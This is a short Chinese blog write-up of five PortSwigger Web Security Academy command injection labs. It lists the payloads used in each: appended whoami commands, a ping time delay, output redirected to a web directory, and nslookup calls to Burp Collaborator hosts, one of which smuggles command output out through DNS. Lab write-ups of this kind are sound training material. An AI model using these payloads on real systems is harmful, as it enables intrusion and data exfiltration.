burpsuit官方实验室之命令注入_tpaer的博客-爱代码爱编程
BurpSuit官方实验室之命令注入
这是BurpSuit官方的实验室靶场,以下将记录个人命令注入共5个Lab的通关过程
Web Security Academy: Free Online Training from PortSwigger
lab1:
OS command injection, simple case
操作系统命令注入,简单情况
找到了product/stock接口
在参数后加;whoami
或者|whoami
lab2:
Blind OS command injection with time delays
具有时间延迟的盲操作系统命令注入
有一个反馈界面
点击提交反馈,发送如下请求包
在email后加入||ping+-c+10+127.0.0.1||
延迟10s
lab3:
Blind OS command injection with output redirection
带输出重定向的盲操作系统命令注入
还是反馈页面,这次是重定向
email中加入||whoami>/var/www/images/tpa1.txt||
访问如下静态页面
成功获得whoami
lab4:
Blind OS command injection with out-of-band interaction
带外交互的盲操作系统命令注入
开启 Burp Collaborator
emai后加||nslookup+i1kvr4nt6vbxx0nevocnxy2qmhs8gx.burpcollaborator.net||
DNS地址
lab5:
Blind OS command injection with out-of-band data exfiltration
带外数据渗透的盲目操作系统命令注入
email加||nslookup+whoami
.ek2qiy6xgp12mh15lgrgk8m85zbpze.burpcollaborator.net||
注意whoami左右要加`